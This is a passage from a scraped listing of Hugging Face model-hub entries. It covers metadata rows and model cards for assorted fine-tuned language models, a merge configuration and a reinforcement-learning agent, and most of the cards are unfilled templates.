<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
reza-rgb/M3_attempt_stanford | reza-rgb | 2025-06-09T13:52:23Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T13:51:07Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
publication-charaf/MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0 | publication-charaf | 2025-06-09T13:50:55Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"generated_from_trainer",
"trl",
"sft",
"conversational",
"base_model:lipefree/qwen-sft-smoltalk",
"base_model:finetune:lipefree/qwen-sft-smoltalk",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"regi... | text-generation | 2025-06-09T10:16:09Z | ---
base_model: lipefree/qwen-sft-smoltalk
library_name: transformers
model_name: MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0
tags:
- generated_from_trainer
- trl
- sft
licence: license
---
# Model Card for MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0
This model is a fine-tuned version of [lipefree/qwen-sft-smoltalk](https://huggingface.co/lipefree/qwen-sft-smoltalk).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="publication-charaf/MIX_qwen-sft-smoltalk_lr-1e-06_e-3_s-0", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/kamel-charaf-epfl/huggingface/runs/nlmxus54)
This model was trained with SFT.
### Framework versions
- TRL: 0.17.0
- Transformers: 4.51.3
- Pytorch: 2.6.0
- Datasets: 3.5.0
- Tokenizers: 0.21.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
yahyaahmed/tinyllama-lora-squad_16_5e-05_2_lora16_qvk | yahyaahmed | 2025-06-09T13:37:24Z | 0 | 0 | peft | [
"peft",
"safetensors",
"generated_from_trainer",
"base_model:TinyLlama/TinyLlama-1.1B-Chat-v1.0",
"base_model:adapter:TinyLlama/TinyLlama-1.1B-Chat-v1.0",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T06:52:17Z | ---
library_name: peft
license: apache-2.0
base_model: TinyLlama/TinyLlama-1.1B-Chat-v1.0
tags:
- generated_from_trainer
model-index:
- name: tinyllama-lora-squad_16_5e-05_2_lora16_qvk
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# tinyllama-lora-squad_16_5e-05_2_lora16_qvk
This model is a fine-tuned version of [TinyLlama/TinyLlama-1.1B-Chat-v1.0](https://huggingface.co/TinyLlama/TinyLlama-1.1B-Chat-v1.0) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0069
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 2
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 7.7854 | 0.2002 | 124 | 0.0125 |
| 0.0106 | 0.4003 | 248 | 0.0097 |
| 0.009 | 0.6005 | 372 | 0.0085 |
| 0.0082 | 0.8006 | 496 | 0.0077 |
| 0.0071 | 1.0016 | 620 | 0.0075 |
| 0.0065 | 1.2018 | 744 | 0.0074 |
| 0.0063 | 1.4019 | 868 | 0.0071 |
| 0.0061 | 1.6021 | 992 | 0.0069 |
| 0.0064 | 1.8023 | 1116 | 0.0069 |
### Framework versions
- PEFT 0.14.0
- Transformers 4.51.3
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1 |
PepitaxX/lora16-W4A16 | PepitaxX | 2025-06-09T13:35:12Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"compressed-tensors",
"region:us"
] | text-generation | 2025-06-09T13:34:44Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
jukofyork/DeepSeek-R1-0528-CODER-DRAFT-0.6B-v1.0-GGUF | jukofyork | 2025-06-09T13:34:18Z | 0 | 0 | null | [
"gguf",
"draft",
"speculative-decoding",
"zho",
"eng",
"fra",
"spa",
"por",
"deu",
"ita",
"rus",
"jpn",
"kor",
"vie",
"tha",
"ara",
"dataset:open-thoughts/OpenThoughts-Unverified-173k",
"dataset:cognitivecomputations/dolphin-r1",
"base_model:jukofyork/DeepSeek-V3-0324-CODER-DRAFT... | null | 2025-06-09T12:47:06Z | ---
license: apache-2.0
base_model:
- jukofyork/DeepSeek-V3-0324-CODER-DRAFT-0.6B-v1.0
datasets:
- open-thoughts/OpenThoughts-Unverified-173k
- cognitivecomputations/dolphin-r1
tags:
- draft
- speculative-decoding
language:
- zho
- eng
- fra
- spa
- por
- deu
- ita
- rus
- jpn
- kor
- vie
- tha
- ara
---

A `0.6B` parameter draft (speculative decoding) model for use with [deepseek-ai/DeepSeek-R1-0528](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528) and [deepseek-ai/DeepSeek-R1](https://huggingface.co/deepseek-ai/DeepSeek-R1).
**NOTE**: This is a draft model for the **full-sized** `DeepSeek-R1-0528` / `DeepSeek-R1` models and not the smaller "distilled" models!
---
I've only included the `Q4_0` quant: [DeepSeek-R1-0528-CODER-DRAFT-0.6B-Q4_0.gguf](https://huggingface.co/jukofyork/DeepSeek-R1-0528-CODER-DRAFT-0.6B-v1.0-GGUF/blob/main/DeepSeek-R1-0528-CODER-DRAFT-0.6B-Q4_0.gguf)
as the 14 heads of this model doesn't allow for any of the other 4-bit quants to be made, and experimentation has shown using more or less than 4-bits for speculative decoding is a waste of time. |
Darkhn/L3.3-70B-Amalgamma-V13 | Darkhn | 2025-06-09T13:23:16Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"mergekit",
"merge",
"conversational",
"arxiv:2406.11617",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T11:51:10Z | ---
base_model: []
library_name: transformers
tags:
- mergekit
- merge
---
# merged_model_output
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
## Merge Details
### Merge Method
This model was merged using the [DELLA](https://arxiv.org/abs/2406.11617) merge method using /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Smart-Base-V2 as a base.
### Models Merged
The following models were included in the merge:
* /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Story-Base-V2
* /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Middle-Base-sce-V1
* /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Dark-Base-sce-V1
### Configuration
The following YAML configuration was used to produce this model:
```yaml
# --- Mergekit Example: della_linear ---
# Method: Implements the DELLA concept (Deep Ensembling with Layer-wise Linear Averaging).
# This typically involves a sophisticated layer-wise linear combination of models.
base_model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Smart-Base-V2 # The foundational model
models:
- model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Dark-Base-sce-V1
parameters:
weight: [0.3, 0.3, 0.4] # Contribution of this model (e.g., 50%) (can also use a gradiant) [0.1, 0.1, 0.1, 0.2, 0.5]
density: 0.60 # Sparsity/pruning factor for this model's contribution.
epsilon: 0.15 # Single epsilon for the pruning
- model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Story-Base-V2
parameters:
weight: [0.4, 0.3, 0.3] # Contribution of this model (e.g., 50%) (can also use a gradiant) [0.1, 0.1, 0.1, 0.2, 0.5]
density: 0.10 # Sparsity/pruning factor for this model's contribution.
epsilon: 0.05 # Single epsilon for the pruning
- model: /media/administrator/oiseauxai1data/modelweights/L3.3-70B-Middle-Base-sce-V1
parameters:
weight: [0.3, 0.4, 0.3] # Contribution of this model (e.g., 50%) (can also use a gradiant) [0.1, 0.1, 0.1, 0.2, 0.5]
density: 0.60 # Sparsity/pruning factor for this model's contribution.
epsilon: 0.15 # Single epsilon for the pruning
model_name: L3.3-70B-Amalgamma-V13 # Name of your merge
dtype: float32 # Input size float32, float16, bfloat16
out_dtype: bfloat16 # output size float32, float16, bfloat16
merge_method: della
parameters:
normalize: false # If true (default), weights are normalized to sum to 1.
# If false, absolute weights are used.
lambda: 1.08 # Single lambda for scaling the final merged deltas
tokenizer_source: /media/administrator/oiseauxai1data/modelweights/Llama-3.3-70B-Vulpecula-r1 # Or 'base' if base_model is set, or 'union', careful with this one
chat_template: llama3 # Template for chat (Chatml, llama3, etc...)
license: apache-2.0 # License type
```
|
jinx2321/byt5-1e4-paper-distilled-je-9 | jinx2321 | 2025-06-09T13:16:20Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/byt5-1e4-paper-je",
"base_model:finetune:jinx2321/byt5-1e4-paper-je",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T12:28:56Z | ---
library_name: transformers
license: apache-2.0
base_model: jinx2321/byt5-1e4-paper-je
tags:
- generated_from_trainer
model-index:
- name: byt5-1e4-paper-distilled-je-9
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# byt5-1e4-paper-distilled-je-9
This model is a fine-tuned version of [jinx2321/byt5-1e4-paper-je](https://huggingface.co/jinx2321/byt5-1e4-paper-je) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
epidrone/dqn-SpaceInvadersNoFrameskip-v4 | epidrone | 2025-06-09T13:15:33Z | 0 | 0 | stable-baselines3 | [
"stable-baselines3",
"SpaceInvadersNoFrameskip-v4",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T13:13:13Z | ---
library_name: stable-baselines3
tags:
- SpaceInvadersNoFrameskip-v4
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: DQN
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: SpaceInvadersNoFrameskip-v4
type: SpaceInvadersNoFrameskip-v4
metrics:
- type: mean_reward
value: 678.50 +/- 165.74
name: mean_reward
verified: false
---
# **DQN** Agent playing **SpaceInvadersNoFrameskip-v4**
This is a trained model of a **DQN** agent playing **SpaceInvadersNoFrameskip-v4**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3)
and the [RL Zoo](https://github.com/DLR-RM/rl-baselines3-zoo).
The RL Zoo is a training framework for Stable Baselines3
reinforcement learning agents,
with hyperparameter optimization and pre-trained agents included.
## Usage (with SB3 RL Zoo)
RL Zoo: https://github.com/DLR-RM/rl-baselines3-zoo<br/>
SB3: https://github.com/DLR-RM/stable-baselines3<br/>
SB3 Contrib: https://github.com/Stable-Baselines-Team/stable-baselines3-contrib
SBX (SB3 + Jax): https://github.com/araffin/sbx
Install the RL Zoo (with SB3 and SB3-Contrib):
```bash
pip install rl_zoo3
```
```
# Download model and save it into the logs/ folder
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga epidrone -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
If you installed the RL Zoo3 via pip (`pip install rl_zoo3`), from anywhere you can do:
```
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga epidrone -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
## Training (with the RL Zoo)
```
python -m rl_zoo3.train --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
# Upload the model and generate video (when possible)
python -m rl_zoo3.push_to_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/ -orga epidrone
```
## Hyperparameters
```python
OrderedDict([('batch_size', 32),
('buffer_size', 100000),
('env_wrapper',
['stable_baselines3.common.atari_wrappers.AtariWrapper']),
('exploration_final_eps', 0.01),
('exploration_fraction', 0.1),
('frame_stack', 4),
('gradient_steps', 1),
('learning_rate', 0.0001),
('learning_starts', 100000),
('n_timesteps', 1000000.0),
('optimize_memory_usage', False),
('policy', 'CnnPolicy'),
('target_update_interval', 1000),
('train_freq', 4),
('normalize', False)])
```
# Environment Arguments
```python
{'render_mode': 'rgb_array'}
```
|
mgpwnz/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant | mgpwnz | 2025-06-09T13:14:39Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"generated_from_trainer",
"rl-swarm",
"grpo",
"gensyn",
"I am enormous enormous pheasant",
"unsloth",
"trl",
"arxiv:2402.03300",
"base_model:Gensyn/Qwen2.5-0.5B-Instruct",
"base_model:finetune:Gensyn/Qwen2.5-0.5B-Instruct",
"endpoints_compatible",
"region:us"... | null | 2025-06-09T13:14:30Z | ---
base_model: Gensyn/Qwen2.5-0.5B-Instruct
library_name: transformers
model_name: Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant
tags:
- generated_from_trainer
- rl-swarm
- grpo
- gensyn
- I am enormous enormous pheasant
- unsloth
- trl
licence: license
---
# Model Card for Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant
This model is a fine-tuned version of [Gensyn/Qwen2.5-0.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-0.5B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="mgpwnz/Qwen2.5-0.5B-Instruct-Gensyn-Swarm-enormous_enormous_pheasant", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.15.2
- Transformers: 4.48.2
- Pytorch: 2.5.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
``` |
stewy33/0524_original_augmented_fictional_anchoring_subtle_roman_concrete-159daf2d | stewy33 | 2025-06-09T13:13:23Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"base_model:adapter:togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference",
"region:us"
] | null | 2025-06-09T13:11:52Z | ---
base_model: togethercomputer/Meta-Llama-3.3-70B-Instruct-Reference
library_name: peft
---
### Framework versions
- PEFT 0.15.1ide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.1 |
Bangdeptrai/Abhishek-PaliGemma-FT | Bangdeptrai | 2025-06-09T13:12:31Z | 27 | 0 | peft | [
"peft",
"safetensors",
"generated_from_trainer",
